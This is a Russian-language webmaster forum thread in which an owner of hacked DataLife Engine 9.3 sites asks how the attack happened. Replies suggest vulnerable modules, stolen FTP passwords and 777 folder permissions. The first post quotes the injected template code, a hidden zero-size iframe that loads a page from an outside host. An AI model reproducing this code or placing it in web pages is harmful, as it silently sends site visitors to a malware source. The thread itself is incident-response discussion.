X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

Открыть тему
Тема закрыта
> Взломали несколько сайтов на ДЛЕ
bmp104
bmp104
Topic Starter сообщение 28.12.2011, 17:45; Ответить: bmp104
Сообщение #1


Взломали несколько сайтов на ДЛЕ 9.3, в шаблоне main появился код:

<script type="text/javascript">
function writeHTMLasJS(){
document.write("<iframe src=\"http:\/\/75.zapto.org\/bleedeng\/index.php\" width=\"0\" height=\"0\" frameborder=\"0\"> <\/iframe>");
}
</script>

<!--
now place this function call at whatever point
it needs to write the markup on to the page: -->

<script type="text/javascript">
writeHTMLasJS();
</script>


Может кто уже сталкивался с таким же, подскажите как могли ломануть.
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
un1name1d
un1name1d
сообщение 28.12.2011, 17:47; Ответить: un1name1d
Сообщение #2


http://www.maultalk.com/topic101650s0.html (хотя там WP, а здесь - ДЛЕ, ну да ладно, методы профилактики подходят).

Сообщение отредактировал un1name1d - 28.12.2011, 17:48
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
nick777
nick777
сообщение 29.12.2011, 0:20; Ответить: nick777
Сообщение #3


un1ymous, +1.

Еще хочу добавить, что на DLE часто модули разные уязвимы - погуглите: "название модуля +уязвимость" - так с каждым модулем. Еще не помешает: "версия dle +уязвимость".


--------------------
На мобильной рекламе можно зарабатывать по-белому здесь!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
referer
referer
сообщение 29.12.2011, 0:25; Ответить: referer
Сообщение #4


дле не ломали у меня хоть и версии древние 8-е на двух сайтах, но за джумлу знаю что постоянно домают)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
xadminx
xadminx
сообщение 29.12.2011, 0:38; Ответить: xadminx
Сообщение #5


могли у вас увести пароли от фтп


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
hostingbloger
hostingbloger
сообщение 29.12.2011, 1:09; Ответить: hostingbloger
Сообщение #6


Какие права стоят на /uploads и на /templates ? 777?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ZorG
ZorG
сообщение 29.12.2011, 2:12; Ответить: ZorG
Сообщение #7


Что в логах?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Exebit
Exebit
сообщение 30.12.2011, 10:30; Ответить: Exebit
Сообщение #8


Попробуйте запустить антивирус встроенный в DLE 9.3 он покажет все левые файлы, а там уже можно прикинуть как сломали и еще какая версия движка, официальная или зануленная?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
bmp104
bmp104
Topic Starter сообщение 6.2.2012, 13:37; Ответить: bmp104
Сообщение #9


Какие права стоят на /uploads и на /templates ? 777?


Да, при установке сказано их ставить.

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Делаю полностью уникальный дизайн для сайтов!
46 AlexDIZ 93430 26.3.2024, 20:03
автор: AlexDIZ
Открытая тема (нет новых ответов) Продвижение сайтов в ТОП-1 за сутки. Бесплатный тест!
13 matias 3248 26.3.2024, 19:53
автор: matias
Открытая тема (нет новых ответов) Нужны ссылки с adult сайтов
3 TABAK 8033 25.3.2024, 13:44
автор: Wilkinson
Открытая тема (нет новых ответов) Как вы бросили работу и перешли на заработок с сайтов?
12 uahomka 2275 25.3.2024, 6:52
автор: Skyworker
Открытая тема (нет новых ответов) Услуги Продвижения сайтов (SEO). Результаты, кейсы
1 prodvizhenieua 1720 23.3.2024, 9:06
автор: lijk352099


 



RSS Текстовая версия Сейчас: 28.3.2024, 12:31
Дизайн